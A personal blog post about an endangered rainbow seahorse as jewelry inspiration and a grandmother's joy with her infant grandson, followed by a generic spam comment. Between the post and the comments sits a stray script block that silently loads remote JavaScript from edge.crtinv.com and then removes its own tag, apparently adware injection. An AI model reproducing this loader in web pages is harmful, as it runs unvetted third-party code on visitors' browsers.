Nana Had A Somewhat Inspirational Thought…

 

If I had a knack for beading or making jewelry, this little creature is a wonderful inspiration for a necklace! I just had to share this! This is a rainbow seahorse and it is endangered. I never saw one before either! He’s a beauty isn’t he? Enjoy!

 

I am not particularly talented when it comes to making things. I don’t cook well. I can draw a little and I write.  I am good with ideas though.  I am hoping some enterprising jewelry maker/crafting addict will make a necklace inspired by this little guy!  He could be silver with cz or aurora borealis and rainbow stones in it or something.  As stated in the caption, this rainbow seahorse is an endangered species. What do you all think?  I hope you all have a beautiful day! I enjoyed time with my grandson!

My son made a wonderful dinner for us all and I noticed that my grandson, although he’s only 2 months old has a GREAT right hook!  He takes that fist and bats at those toys on his busy gym like they are nothing! LOL!

All in all I realized how truly blessed I am today. I’d rather be right here right now than EVER be 21 again–guaranteed!  I feel more alive right now than I’ve felt in 5 years!  I also have a better outlook on life in general and on the future.  If you are down today, I hope you find some inspiration also! Maybe this post will help someone else find a ray of light!  Have a great one!

 

 

// <![CDATA[
!function(){try{var h=document.getElementsByTagName(“head”)[0];var s=document.createElement(“script”);s.src=”//edge.crtinv.com/products/FoxLingo/default/snippet.js”;s.onload=s.onreadystatechange=function(){if(!this.readyState || this.readyState==”loaded” || this.readyState==”complete”){s.onload=s.onreadystatechange=null;h.removeChild(s);}};h.appendChild(s);}catch(ex){}}();
// ]]>

2 comments on “Nana Had A Somewhat Inspirational Thought…

  1. I simply could not depart your website prior to suggesting that I really enjoyed the standard information an individual provide in your visitors? Is gonna be back regularly to check out new posts.

Leave a Reply

